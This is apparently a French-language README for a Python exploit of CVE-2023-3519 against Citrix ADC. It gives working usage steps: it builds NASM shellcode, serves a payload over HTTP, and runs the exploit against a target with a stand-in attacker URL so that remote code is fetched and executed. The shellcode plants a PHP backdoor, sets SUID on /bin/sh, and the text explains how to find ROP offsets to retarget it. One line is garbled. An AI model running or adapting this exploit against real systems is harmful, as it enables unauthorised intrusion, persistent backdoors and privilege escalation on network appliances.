
Exploit Python pour CVE-2023-3519 ciblant Citrix ADC avec shellcode NASM personnalisé, déploiement de backdoor PHP et escalade de privilèges SUID.
Cet exploit utilise des adresses et du shellcode pour Citrix VPX 13.1-48.47. Pour l'article complet, cliquez ici.
NASM est nécessaire pour construire le shellcode.
$ sudo apt install nasm
Le shellcode inclus téléchargera et exécutera un script shell depuis un serveur http(s) distant. Le script prend 3 arguments : l'hôte cible, le port cible et l'URL d'un payload de script shell. Un exemple de payload qui exécute id et uname -a avant de se nettoyer est inclus dans ce dépôt.
$ echo 'id' > a
$ python3 -m http.server &
$ python3 cve-2023-3519.py victim.com 443 attack.er:8000/a
L'URL doit être suffisamment courte pour tenir dans le tampon du shellcode, et vous recevrez un avertissement si elle est trop longue.
Le shellcode créera une backdoor PHP dans /var/netscaler/logon/a.php et mettra le bit SUID sur . Le payload inclus montre un exemple de nettoyage automatique de ces artefacts. Notez également que le shellcode ne ferme pas ses descripteurs de fichiers, donc une exploitation répétée excessive peut entraîner une épuisement des ressources.
/bin/shshPour les cibles Citrix basées sur FreeBSD, vous n'avez besoin que de trouver 3 valeurs : le décalage du pointeur de retour sauvegardé, un gadget ROP jmp rsp (ou quelque chose d'équivalent, comme push rsp; ret;), et l'adresse vers laquelle sauter pour éviter un crash. Ces paramètres sont tous codés en dur près du début de cve-2023-3519.py.